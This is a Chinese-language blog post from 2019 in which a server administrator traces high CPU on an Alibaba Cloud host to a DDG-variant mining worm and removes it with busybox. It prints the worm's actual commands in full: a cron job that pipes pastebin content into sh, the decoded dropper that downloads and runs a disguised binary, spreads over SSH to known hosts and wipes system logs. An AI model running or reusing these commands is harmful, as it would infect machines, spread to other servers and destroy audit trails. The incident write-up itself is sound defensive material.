Loading... ## 发现: 阿里云邮件报警CPU占用率过高。 ## 服务器查看 使用top查看CPU始终是0,进程使用率显示 ps查看没有可疑进程,但是有些使用的进程没有显示,服务还可用 网络查看 有链接但是没有进程显示 ```shell # netstat -lanp tcp 0 0 192.168.1.76:59410 39.106.0.27:22 ESTABLISHED - tcp 0 0 192.168.1.76:36140 104.20.208.21:443 ESTABLISHED - tcp 0 0 192.168.1.76:59416 39.106.0.27:22 ESTABLISHED - tcp 0 0 192.168.1.76:52210 104.20.209.21:443 ESTABLISHED - tcp 0 0 192.168.1.76:22 123.117.161.44:65494 ESTABLISHED 14810/sshd: root@pt tcp 0 0 192.168.1.76:52360 104.20.209.21:443 ESTABLISHED - tcp 0 0 192.168.1.76:36206 104.20.208.21:443 ESTABLISHED - tcp 0 0 192.168.1.76:54964 104.20.209.21:443 ESTABLISHED - tcp 0 0 192.168.1.76:35208 104.20.209.21:443 ESTABLISHED - tcp 0 0 192.168.1.76:22 123.117.161.44:50914 ESTABLISHED 14723/sshd: root@pt tcp 0 0 192.168.1.76:38038 100.100.18.22:3128 ESTABLISHED 12160/CmsGoAgent.li tcp 0 0 192.168.1.76:36194 104.20.208.21:443 ESTABLISHED - tcp 0 0 192.168.1.76:59402 39.106.0.27:22 ESTABLISHED - tcp 0 0 192.168.1.76:59404 39.106.0.27:22 ESTABLISHED - tcp 0 0 192.168.1.76:54944 104.20.209.21:443 ESTABLISHED - tcp 0 0 192.168.1.76:59400 39.106.0.27:22 ESTABLISHED - tcp 0 0 192.168.1.76:59408 39.106.0.27:22 ESTABLISHED - tcp 0 0 192.168.1.76:54954 104.20.209.21:443 ESTABLISHED - tcp 0 93 192.168.1.76:36216 104.20.208.21:443 ESTABLISHED - tcp 0 0 192.168.1.76:59414 39.106.0.27:22 ESTABLISHED - tcp 0 0 192.168.1.76:42143 104.20.208.21:443 ESTABLISHED - tcp 0 0 192.168.1.76:59412 39.106.0.27:22 ESTABLISHED - ``` 定时任务查看 ```shell # crontab -l */15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh ## ``` 清楚任务,再次打开还是原样 期初怀疑是有进程实时监控更改,后来发现是病毒进程 **对常见系统函数(如:readdir、access函数)进行过滤,当返回结果中包含恶意文件和进程时,会主动过滤和隐藏相关结果,使用ls、ps等命令无法看到恶意进程文件。** 定时任务url文件内容 ``` (curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|base64 -d|sh ``` base64解密后内容 ```shell export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab - ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9 ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9 ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "kworkerds" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "watchdogs" | awk '{print $2}'|xargs kill -9 rm -rf /tmp/busybox p=$(ps auxf|grep -v grep|grep ksoftirqds|wc -l) if [ ${p} -eq 0 ];then ps auxf|grep -v grep | awk '{if($3>=50.0) print $2}'| xargs kill -9 fi if [ -e "/tmp/gates.lod" ]; then rm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe) kill -9 $(cat /tmp/gates.lod) rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe) kill -9 $(cat /tmp/moni.lod) rm -rf /tmp/{gates,moni}.lod fi if [ ! -f "/tmp/.lsdpid" ]; then ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl -fsSL http://thyrsi.com/t6/675/1551444050x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444050x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds elif [ ${ARCH}x = "i686x" ]; then (curl -fsSL http://thyrsi.com/t6/675/1551444102x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444102x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds else (curl -fsSL http://thyrsi.com/t6/675/1551444102x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444102x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds fi nohup /tmp/kthrotlds >/dev/null 2>&1 & elif [ ! -f "/proc/$(cat /tmp/.lsdpid)/stat" ]; then ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl -fsSL http://thyrsi.com/t6/675/1551444050x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444050x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds elif [ ${ARCH}x = "i686x" ]; then (curl -fsSL http://thyrsi.com/t6/675/1551444102x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444102x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds else (curl -fsSL http://thyrsi.com/t6/675/1551444102x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444102x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds fi nohup /tmp/kthrotlds >/dev/null 2>&1 & fi if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh >/dev/null 2>&1 &' & done fi echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron # # ``` 之后只查找到文件/tmp/.lsdpid,根据里面的进程查看常用命令都没查到 检查其他定时任务发现 ``` ll /etc/cron.d/ -rw-r--r-- 1 root root 117 03-04 09:58 root -rw-r--r-- 1 root root 254 03-02 01:10 tomcat ``` 这2个文件里面是和定时任务相同的内容 根据上述内容特征上网查找发现 https://baijiahao.baidu.com/s?id=1626772574264851408&wfr=spider&for=pc DDG挖矿病毒,还是变种, ## 病毒处理 使用busybox软件 **为什么busybox可以清理文件?** busybox不依赖于系统的动态库,不受ld.so.preload劫持,能够正常操作文件。 ```shell busybox rm 删除 /var/spool/cron/root /etc/cron.d/root /etc/cron.d/tomcat /tmp/.lsdpid busybox ps -ef 查找到可疑进程 30548 root 1:52 /tmp/kthrotlds 找到pid busybox kill -9 30548 ``` 这下系统正常了 top,ps能正常显示了 最后修改:2019 年 03 月 04 日 11 : 06 AM © 允许规范转载